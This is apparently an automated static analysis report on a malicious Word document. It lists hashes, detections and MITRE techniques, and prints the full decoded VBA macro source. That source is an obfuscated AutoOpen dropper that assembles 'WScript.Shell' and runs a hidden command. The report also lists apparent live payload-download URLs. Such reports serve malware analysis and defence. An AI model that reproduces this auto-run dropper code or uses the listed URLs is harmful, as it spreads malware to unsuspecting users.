Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9578bb3ad7e74a98…

MALICIOUS

Office (OLE)

Size: 71.4 KB
Created: 2019-01-16 19:23:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 3a5e75e646195f93f46729827e219b61
SHA-1: d7fdc0918f9a966800abbdaf2a85a454becda15c
SHA-256: 9578bb3ad7e74a981c39d9e9e83400ac00c210e2b5d72a5cbbc7772d424c95f8
Risk Score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoOpen function, a common technique for malicious Office documents. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute external commands. The script concatenates strings to form 'WscRipt.sHeLl', which is then likely used to download and execute a payload from one of the embedded URLs.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6817914-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6817914-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
     End Select
    Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14
       Select Case azure39
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     End Select
    Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84)
       Select Case Frozen26
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "CheckingAccount84"
    Sub autoopen()
    customerloyalty3 = pixel83
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL
    • http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S@http://jcpers In document text (OLE body)
    • http://medicspoint.pk/5RKX6Ot_r3wyO@http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII@http://aryahospitalksh.com/h1rAZ_HEFn0J_E In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5850 bytes
SHA-256: 4062dde47334f0dc16be5d587d8b0d31c51d364fbced89665b61f201709dbf60
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "executive71"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "optical97"
Function quantify62()
On Error Resume Next
   Select Case visualize71
         Case 980
            InvestmentAccount61 = CLng(679)
etailers20 = initiatives48
            Persistent12 = CDate(yellow90)
Vista95 = firmware20
            Metrics54 = Int(240)
         Case 468
deliverables8 = Borders86
            yellow13 = Cos(bypassing98)
Bedfordshire22 = Facilitator6
            Intelligent97 = ChrB(732)
            efficient13 = Technician83
 End Select
   Select Case Lead93
         Case 502
            Program35 = CLng(826)
HandmadeWoodenBacon3 = intranet9
            model85 = CDate(Dynamic16)
Iowa55 = auxiliary73
            recontextualize39 = Int(617)
         Case 502
Granite43 = Port66
            CheckingAccount45 = Cos(Borders70)
SavingsAccount88 = Plastic81
            frontend71 = ChrB(744)
            payment54 = HTTP15
 End Select
   Select Case Brand60
         Case 828
            LicensedGraniteHat3 = CLng(745)
Groves84 = digital17
            grey81 = CDate(Vanuatu23)
program49 = Orchestrator14
            models33 = Int(712)
         Case 297
transmitting75 = ErgonomicFrozenChips80
            firmware86 = Cos(IncredibleWoodenBall36)
plum42 = directional76
            Chad15 = ChrB(146)
            PracticalMetalPizza64 = index50
 End Select
Handmade89 = "" + teal11 + UzbekistanSum71 + "WscRipt.sHeLl" + microchip35 + turquoise33 + toolset14
   Select Case azure39
         Case 489
            LibyanDinar82 = CLng(729)
engineer64 = Cambridgeshire19
            SmallSteelFish22 = CDate(USB12)
implementation93 = Tunnel24
            Generic78 = Int(17)
         Case 75
Manager43 = Officer98
            deliver76 = Cos(methodology51)
Inverse89 = Forge29
            B2B96 = ChrB(466)
            GamesComputersSports50 = methodologies36
 End Select
   Select Case Villages27
         Case 245
            Representative12 = CLng(839)
BruneiDarussalam86 = connecting15
            USB22 = CDate(InvestmentAccount28)
navigating5 = CreditCardAccount16
            FrenchSouthernTerritories33 = Int(424)
         Case 521
robust65 = Kina97
            MoneyMarketAccount17 = Cos(strategic22)
PracticalWoodenPants76 = Buckinghamshire57
            Sharable15 = ChrB(718)
            FTP18 = BabyMusicIndustrial64
 End Select
IUkiv = 0
   Select Case pricingstructure62
         Case 589
            copying15 = CLng(794)
NewZealandDollar2 = compelling79
            monetize44 = CDate(Bedfordshire98)
CSS33 = HomeClothing98
            payment69 = Int(930)
         Case 110
Centralized58 = generate35
            TastyWoodenChips2 = Cos(redefine35)
calculate48 = FantasticFrozenCar33
            SmallPlasticBike52 = ChrB(129)
            capacity4 = HomeLoanAccount9
 End Select
   Select Case LicensedSoftTable87
         Case 796
            Bolivia85 = CLng(372)
synthesize72 = Plain57
            Grove8 = CDate(Dynamic54)
Utah69 = generate8
            SerbianDinar72 = Int(770)
         Case 45
supplychains54 = Devolved90
            Rubber94 = Cos(withdrawal88)
MoneyMarketAccount18 = USB30
            Human14 = ChrB(669)
            Upgradable26 = global55
 End Select
   Select Case needsbased36
         Case 247
            Berkshire34 = CLng(797)
Key53 = Utah52
            turquoise18 = CDate(webenabled7)
Bedfordshire4 = killer42
            robust22 = Int(607)
         Case 451
Falls88 = USB96
            Corners69 = Cos(bypassing45)
bypass36 = Iowa90
            orchestration47 = ChrB(276)
            Handmade32 = calculate45
 End Select
Optional88 = Array(synergize98, Rubber47, Lodge84, CreateObject("" + Reengineered28 + ToysToys73 + BabyIndustrial54 + Functionbased44 + usercentric46 + Handmade89).Run!("" + Causeway59 + RAM2 + executive71.TextBox1 + feed16 + webreadiness58, IUkiv), Communications48, Missouri54, bottomline84)
   Select Case Frozen26
         Case 424
            quantifying22 = CLng(765)
scale18 = Identity93
            Plastic13 = CDate(Angola17)
SCSI76 = IntelligentSoftSoap70
            generate93 = Int(887)
         Case 249
SleekMetalCar61 = Userfriendly80
            Technician13 = Cos(Motorway61)
Intranet52 = copy36
            Lodge32 = ChrB(685)
            black63 = Selfenabling13
 End Select
   Select Case HTTP71
         Case 153
            salmon60 = CLng(253)
salmon67 = violet33
            olive67 = CDate(cyan45)
Product29 = Inlet21
            maximize86 = Int(126)
         Case 908
pixel47 = International74
            zerotolerance95 = Cos(ErgonomicFreshCar41)
SDD92 = ToolsHealthMusic39
            Accounts72 = ChrB(831)
            SavingsAccount28 = methodical77
 End Select
   Select Case migration90
         Case 157
            regional37 = CLng(415)
Landing23 = port22
            Customer92 = CDate(productize79)
Organized54 = matrices57
            ToolsIndustrial64 = Int(806)
         Case 212
Functionality93 = Rapid12
            Underpass58 = Cos(Focused18)
Gorgeous79 = grow4
            TastyFrozenSausages98 = ChrB(158)
            maroon83 = neural52
 End Select
End Function


Attribute VB_Name = "CheckingAccount84"
Sub autoopen()
customerloyalty3 = pixel83
quantify37 = Array(GenericRubberPizza21, Borders75, LicensedConcreteHat87, quantify62, Handmade68, Rubber86, Metal48)
supplychains83 = channels32
End Sub
Function payment91()
index64 = Well45
End Function